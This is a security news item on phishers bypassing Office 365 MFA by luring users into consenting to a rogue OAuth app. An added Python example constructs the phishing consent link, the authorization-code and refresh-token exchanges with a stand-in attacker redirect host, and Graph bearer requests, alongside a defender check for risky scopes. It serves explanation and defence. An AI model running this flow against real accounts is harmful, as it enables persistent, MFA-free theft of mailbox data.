Phishers are trying to bypass Office 365 MFA via rogue apps
2020-05-19 13:12

Phishers are trying to bypass the multi-factor authentication protection on users' Office 365 accounts by tricking them into granting permissions to a rogue application.

How? The phishing link points at a genuine Microsoft consent prompt for the attacker's application. When the victim accepts, the Microsoft identity platform redirects the browser to the attacker-controlled redirect URI with an OAuth 2.0 authorization code. The rogue application exchanges that code for an access token and presents the token to Microsoft Graph, which authorizes its access. The victim satisfied MFA themselves during sign-in, so the attacker's app is never challenged for a second factor.

"Applications that want to access Office 365 data on behalf of a user do so through Microsoft Graph authorizations. However, they must first obtain an access token from the Microsoft Identity Platform," Cofense researchers explained.

The access token the rogue app receives expires after a while (access tokens from the Microsoft identity platform live for roughly an hour), but the app has also been granted permission to obtain refresh tokens (the offline_access scope), which it can exchange for new access tokens without any further interaction with the victim. The app can therefore retain access potentially indefinitely.
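The exchange described in the two paragraphs above, reconstructed offline as an added example. This is not code from the Help Net Security or Cofense write-up; the client ID, client secret, redirect URI, authorization code and tokens are constructed placeholders, while the login.microsoftonline.com endpoints, the graph.microsoft.com host and the permission names are the real ones. It builds the consent link a phish would carry, the code-for-token and refresh-token requests the rogue app would send, the bearer request it would make to Graph, and a defender-side check that explains why a given consent link is dangerous.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Microsoft identity platform v2.0 endpoints and Microsoft Graph host (real).
AUTHORIZE_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
GRAPH = "https://graph.microsoft.com"

# Hypothetical rogue app registration: constructed placeholders, not real identifiers.
CLIENT_ID = "11111111-2222-3333-4444-555555555555"
CLIENT_SECRET = "constructed-secret"
REDIRECT_URI = "https://rogue-app.example/callback"

# Delegated Graph permissions that hand over mailbox, calendar, contact or file
# contents. The scope names are real; which ones count as "data access" is this
# example's own choice.
DATA_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read", "Calendars.Read",
}


def consent_url(scopes, state="constructed-state"):
    """The link in the phish. It genuinely points at Microsoft, so the victim sees a
    real sign-in and consent prompt and satisfies MFA themselves, for the attacker's app."""
    params = {
        "client_id": CLIENT_ID,
        "response_type": "code",
        "redirect_uri": REDIRECT_URI,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state,
    }
    return AUTHORIZE_URL + "?" + urlencode(params)


def code_from_redirect(redirect):
    """After 'Accept', Microsoft sends the browser to REDIRECT_URI?code=...&state=...;
    the attacker's callback handler extracts the authorization code."""
    return parse_qs(urlparse(redirect).query)["code"][0]


def code_exchange_request(code, scopes):
    """Token-endpoint POST that trades the authorization code for tokens. A refresh
    token is only included in the response when offline_access was consented to."""
    return TOKEN_URL, {
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": REDIRECT_URI,
        "scope": " ".join(scopes),
    }


def refresh_request(refresh_token, scopes):
    """Token-endpoint POST that mints a new access token once the old one expires.
    No user interaction and no MFA prompt: this is the persistence the article describes."""
    return TOKEN_URL, {
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "grant_type": "refresh_token",
        "refresh_token": refresh_token,
        "scope": " ".join(scopes),
    }


def graph_request(access_token, path="/v1.0/me/messages"):
    """How the token is presented to Graph: a plain bearer header, nothing tied to MFA."""
    return GRAPH + path, {"Authorization": "Bearer " + access_token}


def assess_consent_url(url):
    """Defender-side check: list the reasons a consent link is dangerous before a user clicks it."""
    q = parse_qs(urlparse(url).query)
    scopes = set(q.get("scope", [""])[0].split())
    findings = []
    persistent = "offline_access" in scopes
    data = sorted(scopes & DATA_SCOPES)
    if persistent:
        findings.append("offline_access: app gets refresh tokens and keeps working after the access token expires")
    if data:
        findings.append("data access: " + ", ".join(data))
    if persistent and data:
        findings.append("persistent mailbox/file access with no further MFA prompt for the attacker")
    return findings


if __name__ == "__main__":
    scopes = ["openid", "offline_access", "User.Read", "Mail.Read"]
    url = consent_url(scopes)
    print(url)
    for finding in assess_consent_url(url):
        print(" -", finding)
    # Constructed redirect, as the attacker's callback would receive it after 'Accept'.
    code = code_from_redirect(REDIRECT_URI + "?code=CONSTRUCTED_CODE&state=constructed-state")
    print(code_exchange_request(code, scopes))
    print(refresh_request("CONSTRUCTED_REFRESH_TOKEN", scopes))
    print(graph_request("CONSTRUCTED_ACCESS_TOKEN"))
```

The point to take from `assess_consent_url` is the combination: offline_access on its own is common in legitimate apps, and Mail.Read on its own is lost when the access token expires, but together they give an unknown publisher durable mailbox access that no later MFA prompt will interrupt.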

Once the rogue app's access is revoked (its consent grant removed from the tenant so it can no longer obtain tokens), victims must change their O365 account password and check whether the attackers have switched off MFA protection or modified any of its settings.


News URL

http://feedproxy.google.com/~r/HelpNetSecurity/~3/Y_pngiQtDO4/